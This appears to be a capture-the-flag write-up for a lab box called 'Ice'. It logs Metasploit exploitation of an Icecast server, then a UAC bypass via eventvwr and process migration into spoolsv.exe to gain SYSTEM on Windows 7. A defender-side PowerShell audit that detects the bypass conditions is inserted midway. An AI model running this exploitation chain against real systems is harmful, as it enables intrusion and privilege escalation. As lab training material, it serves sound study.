Ice

METASPLOIT

  • Using: windows/http/icecast_header
[*] Started reverse TCP handler on 10.10.20.30:4444 
[*] Sending stage (175686 bytes) to 10.10.96.65
[*] Meterpreter session 1 opened (10.10.20.30:4444 -> 10.10.96.65:49172) at 2022-10-10 06:45:40 +0200
meterpreter > getuid 
Server username: Dark-PC\Dark
meterpreter > sysinfo
Computer : DARK-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows

Enumeration

  • Using: post/multi/recon/local_exploit_suggester
[*] 10.10.96.65 - Collecting local exploits for x86/windows...
[*] 10.10.96.65 - 170 exploit checks are being tried...
[+] 10.10.96.65 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] Post module execution completed

Exploitation

  • Using: windows/local/bypassuac_eventvwr
[*] Started reverse TCP handler on 10.10.20.30:4445 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (175686 bytes) to 10.10.96.65
[*] Meterpreter session 2 opened (10.10.20.30:4445 -> 10.10.96.65:49186) at 2022-10-10 06:50:55 +0200
[*] Cleaning up registry keys ..
meterpreter > getuid 
Server username: Dark-PC\Dark
meterpreter > sysinfo
Computer : DARK-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
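As a defender-side addition (not part of the original writeup or of the Metasploit module), the following PowerShell audit reports the two conditions the bypassuac_eventvwr run above depended on: a UAC level below "Always notify" (the module reports "UAC is set to Default" and states it can bypass that setting) and a per-user override of the .msc file handler, which is how the eventvwr technique gets its payload run elevated. The UAC policy value names and the mscfile handler key path come from Microsoft's UAC documentation and the public description of the technique, not from this page.

```powershell
# Added defender-side audit; not part of the original writeup. Run from an
# elevated PowerShell session on the host being checked.

function Get-UacLevelStatus {
    # Documented UAC policy values (not taken from the writeup). Only
    # "Always notify" (ConsentPromptBehaviorAdmin=2 on the secure desktop)
    # stops auto-elevating binaries such as eventvwr.exe from being abused;
    # the "Default" level shown in the module output does not.
    $sys = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $lua    = $sys.EnableLUA
    $admin  = $sys.ConsentPromptBehaviorAdmin
    $secure = $sys.PromptOnSecureDesktop
    [pscustomobject]@{
        EnableLUA                  = $lua
        ConsentPromptBehaviorAdmin = $admin
        PromptOnSecureDesktop      = $secure
        AlwaysNotify               = ($lua -eq 1 -and $admin -eq 2 -and $secure -eq 1)
    }
}

function Find-MscFileHandlerOverride {
    # The eventvwr bypass gives the user's own hive a handler for .msc files
    # that mmc.exe picks up before the machine-wide one. A clean system has no
    # such key, so any hit is worth investigating. Every loaded user hive is
    # checked, because the key lives in the hive of the user whose session ran
    # the bypass, not necessarily the auditor's.
    Get-ChildItem 'Registry::HKEY_USERS' | ForEach-Object {
        $key = "Registry::$($_.Name)\Software\Classes\mscfile\shell\open\command"
        if (Test-Path $key) {
            [pscustomobject]@{
                Hive    = $_.PSChildName
                Command = (Get-ItemProperty -Path $key).'(default)'
            }
        }
    }
}

$uac = Get-UacLevelStatus
if (-not $uac.AlwaysNotify) {
    Write-Warning "UAC is not at 'Always notify' (ConsentPromptBehaviorAdmin=$($uac.ConsentPromptBehaviorAdmin)); auto-elevate bypasses like the one above remain possible."
}
$hits = @(Find-MscFileHandlerOverride)
if ($hits.Count -gt 0) {
    $hits | ForEach-Object { Write-Warning "mscfile handler override in $($_.Hive): $($_.Command)" }
} else {
    Write-Output 'No per-user mscfile handler override found in any loaded hive.'
}
```

The module output above ends with "Cleaning up registry keys", so the handler check catches a bypass that is in progress or was interrupted; for completed runs, rely on registry-modification auditing of that key path instead.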

  • We need to move into a process that has the permissions required to interact with the LSASS service (Local Security Authority Subsystem Service), which is responsible for authentication within Windows.
  • Migrating to the Print Spooler service process, spoolsv.exe, which runs as NT AUTHORITY\SYSTEM:
meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
[..]
1268 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
[..]

meterpreter > migrate -N spoolsv.exe
[*] Migrating from 2532 to 1268...
[*] Migration completed successfully.

  • We now have SYSTEM rights: NT AUTHORITY\SYSTEM
meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM